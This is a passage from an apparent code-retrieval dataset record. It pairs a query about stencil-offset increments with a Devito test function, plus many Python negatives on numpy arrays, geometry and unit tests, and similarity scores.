np.linspace(0.1, 9.7, 33)\n index4 = np.linspace(0.2, 9.8, 33)\n index5 = np.linspace(0.2, 7.8, 27)\n index6 = [0.15, 0.25, 0.3, 0.4, 0.45]+[0.5+i*0.2 for i in range(28)]\n\n print(index6)\n plt.plot(index, Func[1], color='purple')\n plt.plot(index, Func2[1], color='red')\n plt.plot(index3, Func3[1], color='black')\n plt.plot(index4, Func4[1], color='blue')\n plt.plot(index5, Func5[1], color='yellow')\n plt.plot(index6, Func6[1], color='orange')\n\n plt.show()", "def test_processed_points_calculation(self):\n\n assert self.test_shape.processed_points == [\n (1030.0, 525.0, \"straight\"),\n (1030.0, 475.0, \"straight\"),\n (970.0, 475.0, \"straight\"),\n (970.0, 525.0, \"straight\"),\n (1030.0, 525.0, \"straight\"),\n ]", "def test_caekl_1(d):\n assert I(d) == pytest.approx(J(d))", "def test__point_right_addition__given_vector_and_point__return_correct_point():\n assert Vector((0, 1, 2)) + Point((3, 4, 5)) == Point((3, 5, 7))", "def test_rastrigin(self):\n rastrigin = get_problem('rastrigin', dimension=self.dimension)\n self.assertEqual(rastrigin(self.array), 0.0)", "def test_sum_vec(self):\n self.init()\n assert sum_vec(self.i32_1) == np.sum(self.i32_1)\n assert sum_vec(self.fi32_1) == np.sum(self.i32_1)\n assert sum_vec(self.i64_1) == np.sum(self.i64_1)\n assert sum_vec(self.fi64_1) == np.sum(self.i64_1)\n assert sum_vec(self.f32_1) == np.sum(self.f32_1)\n assert sum_vec(self.ff32_1) == np.sum(self.ff32_1)\n assert sum_vec(self.f64_1) == np.sum(self.f64_1)\n assert sum_vec(self.ff64_1) == np.sum(self.ff64_1)", "def test_scalar_index(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', shape=(), dtype='f')\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == ()", "def test_multiply_scalar(self):\n a = Vector(1, 2)\n c = a * 3\n assert c.x == 3\n assert c.y == 6", "def test_step(self):\n fun = get_problem('step', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_grid():\n with get_test_data('interpolation_test_grid.npz') as fobj:\n data = np.load(fobj)\n return data['xg'], data['yg']", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def mul(Z,X,Y):", "def test_identity_function(data_and_labels):\n input_data = data_and_labels[0]\n\n output_data = unprotected_query(input_data)\n\n np.testing.assert_array_equal(input_data, output_data)", "def test_ThinDataMultiArray(self):\n for split in self.splits:\n y_data, x_data = data_process.thinData(y_testMultiple, xdim_test, split)\n for spec in y_data:\n self.assertTrue(len(spec) == len(x_data))", "def test_tensor_can_be_added_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n i, j = p.R_dumms[:2]\n x = IndexedBase('x')\n y = IndexedBase('y')\n\n tensor = dr.sum((i, p.R), x[i, j] * y[j, i])\n\n for res in [\n dr.einst(tensor),\n dr.sum((j, p.R), tensor)\n ]:\n assert res == dr.einst(x[i, j] * y[j, i])", "def test_equal12():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True], [False, False, False], [True, True, False]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_multiply(self):\n self.assertEqual(work_file.multiply(10, 5), 50)\n self.assertEqual(work_file.multiply(-1, 1), -1)\n self.assertEqual(work_file.multiply(-1, -1), 1)", "def vectorized_loops(self, data):\n\n # TODO: finish this.\n return np.add(np.multiply(data,data), data)" ]
[ "0.6647943", "0.6466135", "0.6279551", "0.62339604", "0.6172996", "0.61697084", "0.6152088", "0.6150274", "0.6137789", "0.6136748", "0.6109442", "0.6009509", "0.5945426", "0.591577", "0.5912449", "0.590353", "0.5883301", "0.58808935", "0.5876383", "0.587444", "0.58706623", "0.581656", "0.5810265", "0.5808779", "0.5808747", "0.58054376", "0.5790785", "0.5774366", "0.57602584", "0.5754303", "0.57476443", "0.5722245", "0.57166797", "0.57094395", "0.57071763", "0.56934214", "0.56771004", "0.56718993", "0.5657112", "0.56514525", "0.56496596", "0.5646546", "0.55999696", "0.5596249", "0.5577879", "0.55765724", "0.5572999", "0.55707777", "0.5570443", "0.5560207", "0.55590683", "0.5558422", "0.5556445", "0.5555051", "0.5549643", "0.55482036", "0.5547855", "0.5547014", "0.5543191", "0.55410033", "0.553637", "0.5534844", "0.5528918", "0.55287313", "0.5520735", "0.5517507", "0.55145854", "0.5509618", "0.5505837", "0.55018204", "0.54962575", "0.54919636", "0.54913133", "0.5489694", "0.54886574", "0.5488327", "0.54836565", "0.54795134", "0.5476245", "0.5475535", "0.546448", "0.54505503", "0.5428535", "0.5414635", "0.54090196", "0.54072344", "0.54059136", "0.5404647", "0.54029953", "0.53987163", "0.5395909", "0.5395266", "0.5392763", "0.53914285", "0.53902376", "0.5386458", "0.53835225", "0.5380868", "0.5380585", "0.5370013", "0.53645724" ]
0.0
-1
Tests pointwise increments with stencil offsets in one dimension
def test_indexed_increment(self, expr, result): j, l = dimify('j l') a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base fa = a.function fa.data[1:, 1:] = 0 eqn = eval(expr) Operator(eqn)(fa) assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def coordination(c, stencil=nn_stencil):\n\n coordination = np.zeros_like(c, dtype=int)\n for dx, dy in stencil:\n tmp = np.array(c, dtype=bool, copy=True)\n if dx != 0:\n tmp = np.roll(tmp, dx, 0)\n if dy != 0:\n tmp = np.roll(tmp, dy, 1)\n coordination += tmp\n return coordination", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_compute_pixel_ray_directions_vectorized() -> None:\n fx = 10\n fy = 10\n\n # dummy 2d coordinates in the image plane.\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n\n # principal point is at (10,5)\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n gt_ray_dir: NDArrayFloat = np.array([2, -3, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n for i in range(4):\n assert np.allclose(gt_ray_dir, ray_dirs[i])", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def test_coord_preceding_fs(self):", "def test_advanced_inc_and_set(self):\r\n rng = numpy.random.RandomState(seed=utt.fetch_seed())\r\n all_inputs_var = []\r\n all_inputs_num = []\r\n all_outputs_var = []\r\n all_outputs_num = []\r\n for set_instead_of_inc in (False, True):\r\n for inplace in (False, True):\r\n for data_shape in ((10,), (4, 5), (1, 2, 3), (4, 5, 6, 7)):\r\n data_n_dims = len(data_shape)\r\n data_size = numpy.product(data_shape)\r\n # Corresponding numeric variable.\r\n data_num_init = numpy.arange(data_size, dtype=self.dtype)\r\n data_num_init = data_num_init.reshape(data_shape)\r\n inc_shapes = [data_shape[i:]\r\n for i in xrange(0, len(data_shape) + 1)]\r\n for inc_shape in inc_shapes:\r\n inc_n_dims = len(inc_shape)\r\n # We copy the numeric value to be 100% sure there is no\r\n # risk of accidentally sharing it.\r\n data_num = data_num_init.copy()\r\n # Symbolic variable to be incremented.\r\n # We create a new one every time in order not to\r\n # have duplicated variables in the function's inputs\r\n data_var = tensor.tensor(\r\n broadcastable=[False] * data_n_dims,\r\n dtype=self.dtype)\r\n # Symbolic variable with rows to be incremented.\r\n idx_var = theano.tensor.vector(dtype='int64')\r\n n_to_inc = rng.randint(data_shape[0])\r\n # Corresponding numeric variable.\r\n idx_num = rng.randint(0, data_shape[0], n_to_inc)\r\n idx_num = idx_num.astype('int64')\r\n # Symbolic variable with increment value.\r\n inc_var = tensor.tensor(\r\n broadcastable=[False] * inc_n_dims,\r\n dtype=self.dtype)\r\n # Trick for the case where `inc_shape` is the same as\r\n # `data_shape`: what we actually want is the first\r\n # shape element to be equal to the number of rows to\r\n # increment.\r\n if len(inc_shape) == len(data_shape):\r\n inc_shape = (n_to_inc,) + inc_shape[1:]\r\n inc_size = numpy.product(inc_shape)\r\n # Corresponding numeric variable.\r\n inc_num = rng.uniform(size=inc_size).astype(self.dtype)\r\n inc_num = inc_num.reshape(inc_shape)\r\n # Result of the incrementation.\r\n # (i) Theano\r\n if set_instead_of_inc:\r\n op = set_subtensor\r\n else:\r\n op = inc_subtensor\r\n output = op(data_var[idx_var], inc_var,\r\n inplace=inplace)\r\n # (ii) Numpy (note that Numpy increments only once\r\n # duplicated indices, so we cannot directly use +=).\r\n data_copy = data_num.copy()\r\n for j, idx in enumerate(idx_num):\r\n if len(inc_shape) == len(data_shape):\r\n # Special case where there is no broadcasting.\r\n if set_instead_of_inc:\r\n data_copy[idx] = inc_num[j]\r\n else:\r\n data_copy[idx] += inc_num[j]\r\n else:\r\n if set_instead_of_inc:\r\n data_copy[idx] = inc_num\r\n else:\r\n data_copy[idx] += inc_num\r\n data_var = theano.In(data_var, mutable=True)\r\n\r\n # Remember data for the Theano function (see below).\r\n all_inputs_var += [data_var, idx_var, inc_var]\r\n all_inputs_num += [data_num, idx_num, inc_num]\r\n all_outputs_var.append(output)\r\n all_outputs_num.append(data_copy)\r\n if False: # Enable for debugging purpose.\r\n f = self.function([data_var, idx_var, inc_var],\r\n output, accept_inplace=inplace,\r\n op=self.adv_incsub1)\r\n if inplace:\r\n # Ensure calling `f` will not alter `data_num`.\r\n data_num = data_num.copy()\r\n f_out = f(data_num.copy(), idx_num, inc_num)\r\n assert numpy.allclose(f_out, data_copy)\r\n if not inplace:\r\n # Sanity check: `data_num` should be intact.\r\n assert (data_num == data_num_init).all()\r\n\r\n # Actual test (we compile a single Theano function to make it faster).\r\n orig_warn = theano.config.warn.gpu_set_subtensor1\r\n try:\r\n theano.config.warn.gpu_set_subtensor1 = False\r\n f = self.function(all_inputs_var, all_outputs_var,\r\n accept_inplace=True,\r\n op=self.adv_incsub1,\r\n N=len(all_outputs_var))\r\n finally:\r\n theano.config.warn.gpu_set_subtensor1 = orig_warn\r\n\r\n f_outs = f(*all_inputs_num)\r\n assert len(f_outs) == len(all_outputs_num)\r\n for f_out, output_num in izip(f_outs, all_outputs_num):\r\n # NB: if this assert fails, it will probably be easier to debug if\r\n # you enable the debug code above.\r\n assert numpy.allclose(f_out, output_num)", "def test_increment(self):\n x0 = 0\n y0 = increment(x0) # y0 should be 1\n self.assertEqual(y0, 1)\n\n x1 = 100\n y1 = increment(x1) # y1 should be 101\n self.assertTrue(y1, 101)\n\n x2 = -1\n y2 = increment(x2) # y2 should be 0\n self.assertEqual(y2, 0)\n\n x3 = -1.5\n y3 = increment(x3) # y3 should be -0.5\n self.assertEqual(y3, -0.5)", "def test_output_range(self):\n byt = bytscl(self.array1)\n outside = (byt < 0) | (byt > 255)\n total = numpy.sum(outside)\n self.assertEqual(total, 0)", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def test_shift_point(self):\n point = (0,0)\n new_point = utils.shift_point(point, 3, 4)\n self.assertEqual((3,4), new_point)\n\n point = (-2.34, 1.19)\n new_point = utils.shift_point(point, 2.34, -1.19)\n self.assertEqual((0,0), new_point)", "def test_compute_pixel_ray_directions_vectorized_entireimage() -> None:\n fx = 10\n fy = 10\n\n img_w = 100\n img_h = 50\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n uv_list = []\n for u in range(img_w):\n for v in range(img_h):\n uv_list += [(u, v)]\n\n uv: NDArrayInt = np.array(uv_list)\n assert uv.shape == (img_w * img_h, 2)\n\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n # compare w/ vectorized, should be identical\n for i, ray_dir_vec in enumerate(ray_dirs):\n u, v = uv[i]\n ray_dir_nonvec = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n assert np.allclose(ray_dir_vec, ray_dir_nonvec)", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def gincrement(x,y,xr,yr,xsgn=1,ysgn=1,nstep=1,p2=False):\n \n step = 1\n \n # Bad until proven okay \n newx = None\n newy = None\n \n # X and y limits \n x0 = xr[0]\n x1 = xr[1] \n y0 = yr[0] \n y1 = yr[1] \n \n # Are we in the box? \n if (x < x0) or (x > x1) or (y < y0) or (y > y1):\n return None,None\n\n # Wrong signs \n if np.abs(xsgn) != 1: \n return None,None\n if np.abs(ysgn) != 1:\n return None,None \n \n # figuring out the case \n #bit = ((ysgn+1.)*0.5) + 2.*((xsgn+1.)*0.5) \n #bit = int(bit) \n # \n # bit (x,y) \n # 0 - (-1,-1) \n # 1 - (-1,+1) \n # 2 - (+1,-1) \n # 3 - (+1,+1) \n\n tx = x\n ty = y\n \n # Looping through all the steps \n for i in range(nstep): \n \n # p2, incrementing vertically \n if p2:\n # UP, at the end \n if (ysgn == 1) and (ty == y1):\n return None,None\n # DOWN, at the end \n if (ysgn == -1) and (ty == y0): \n return None,None\n # Not at end, normal increment \n newx = tx \n newy = ty + ysgn * step \n \n # Incrementing Sideways \n else: \n # RIGHT, xsgn = +1 \n if (xsgn == 1): \n # UP, the very end \n if (ysgn == 1) and (tx == x1) and (ty == y1): \n return None,None\n # DOWN, the very end \n if (ysgn == -1) and (tx == x1) and (ty == y0): \n return None,None\n # At end of x, increment y \n if (tx == x1): \n newx = x0 \n newy = ty + ysgn * step \n # Normal increment \n if (tx != x1): \n newx = tx + xsgn * step \n newy = ty \n \n # LEFT, xsgn = -1 \n if (xsgn == -1): \n # UP, the very end \n if (ysgn == 1) and (tx == x0) and (ty == y1): \n return None,None\n # DOWN, the very end \n if (ysgn == -1) and (tx == x0) and (ty == y0): \n return None,None\n # At end of x, increment y \n if (tx == x0): \n newx = x1 \n newy = ty + ysgn * step \n # Normal increment \n if (tx != x0): \n newx = tx + xsgn * step \n newy = ty \n \n # In case we're looping \n tx = newx \n ty = newy \n \n # Final answer \n newx = tx \n newy = ty \n\n return newx,newy", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_pointnum2():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(100, -100), radius=400, thickness=25)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def offset_points(self, points: np.ndarray, offset: Point) -> np.ndarray:\r\n points[:, :, 0] += offset.x\r\n points[:, :, 1] += offset.y\r\n return points", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_p1_extended_segment(grid):\n space = bempp.api.function_space(\n grid,\n \"P\",\n 1,\n segments=[1],\n include_boundary_dofs=True,\n truncate_at_segment_edge=False,\n )\n\n eligible_index_pairs = set()\n\n for vertex_index in range(grid.number_of_vertices):\n neighbors = grid.vertex_neighbors.indices[\n grid.vertex_neighbors.indexptr[\n vertex_index\n ] : grid.vertex_neighbors.indexptr[vertex_index + 1]\n ]\n if 1 in grid.domain_indices[neighbors]:\n # Vertex adjacent an element with domain index 1\n for index_pair in zip(*_np.where(grid.elements == vertex_index)):\n eligible_index_pairs.add(index_pair)\n\n for local_index in range(3):\n for elem_index in range(grid.number_of_elements):\n if (local_index, elem_index) in eligible_index_pairs:\n assert space.local_multipliers[elem_index, local_index] == 1\n else:\n assert space.local_multipliers[elem_index, local_index] == 0", "def recolorPixels(x,y,px, newColorArray):\r\n for i in range(0+coeff1*x,coeff1+coeff1*x):\r\n for j in range(0+coeff1*y,coeff1+coeff1*y):\r\n px[i,j]=newColorArray[x][y]", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test_y_before_x(self):", "def test_sum_pos_2() -> None:\n # Note: We take 1 step (first item) - thus end up on square 2\n # (square 1 being home).\n assert nth(sw.sum_walk(), 0) == 1", "def test_pointnum1():\n shape = paramak.CapsuleVacuumVessel(outer_start_point=(0, 0), radius=300, thickness=10)\n assert len(shape.points) == 12\n assert len(shape.processed_points) == 13", "def segement_divide(pts,step=0.10, offset_x=0.01, offset_y=0.01):\n\n # Select the x and y of the points\n n = len(pts)\n \n z = 0.0\n \n points_plane = [] \n points_x = []\n paint_point = []\n\n for i in range(n):\n points_plane.append([pts[i][0], pts[i][1]])\n \n # Sorted the list according to x \n points_plane.sort(key=lambda x:x[0])\n\n # Segment the points according to x \n counter = 0 # Count the interval\n x_min = points_plane[0][0]\n x_max = points_plane[n-1][0]\n\n # The whole interval that needs to be divided\n upper = x_max + offset_x\n lower = x_min - offset_x\n lower_bound = lower\n \n # Set each segement's lower and upperbound\n while (lower_bound + step <= upper): \n # The break condition will be lower_bound > upper - step\n upper_bound = lower_bound + step\n\n # Find the index between lower bound and upper bound\n # First, find the index which x >= lower bound\n index = 0\n \n while (points_plane[index][0] < lower_bound): \n index = index + 1 # The index of the first point in the interval\n \n # If there is at least one point in the [lower_bound, upper_bound]\n if (points_plane[index][0] <= upper_bound): \n\n x_start = points_plane[index][0]\n y_max = points_plane[index][1]\n y_min = points_plane[index][1]\n \n while (points_plane[index][0] <= upper_bound): \n # The break condition will be x[index] > upper bound or index = n - 1\n # Compute the y max and y min in this interval\n \n if points_plane[index][1] > y_max: \n y_max = points_plane[index][1]\n\n if points_plane[index][1] < y_min:\n y_min = points_plane[index][1]\n \n if index < n - 1:\n index = index + 1\n else:\n break\n # The index of the last point in the interval, when index < n-1\n \n x_end = points_plane[index][0]\n\n paint_point.append([lower_bound,y_max+offset_y,z]) \n paint_point.append([lower_bound,y_min-offset_y,z])\n points_x.append([x_start, x_end])\n \n counter = counter + 1\n\n # Update interval\n lower_bound = upper_bound - offset_x\n \n # Deal with the last interval\n lower_bound_last = upper - step\n index_last = 0\n counter = counter + 1\n while ((index_last < n) and (points_plane[index_last][0] < lower_bound_last)): \n # The first point in the last interval\n index_last = index_last + 1\n \n if (index_last < n): \n # There is at least one point in the last interval\n x_start_last = points_plane[index_last][0]\n y_max_last = points_plane[index_last][1]\n y_min_last = points_plane[index_last][1]\n\n while ((index_last)<n) and (points_plane[index_last][0] <= upper):\n\n if points_plane[index_last][1] > y_max_last: \n y_max_last = points_plane[index_last][1]\n \n if points_plane[index_last][1] < y_min_last:\n y_min_last = points_plane[index_last][1]\n\n index_last = index_last + 1\n \n index_last = index_last - 1 # The index of the last point in the interval\n \n paint_point.append([lower_bound_last, y_max_last+offset_y, z])\n paint_point.append([lower_bound_last, y_min_last-offset_y, z])\n# paint_point.append([upper, y_max_last+offset_y, z])\n# paint_point.append([upper, y_min_last-offset_y, z])\n# return trans_to_end(paint_point)\n return paint_point", "def test_add_refpix():\n data = np.ones((10, 10))\n refpix = (2, 3, 4, 5)\n\n new_array = bpd.add_refpix(data, refpix)\n yd, xd = new_array.shape\n print, xd, yd\n\n assert yd == 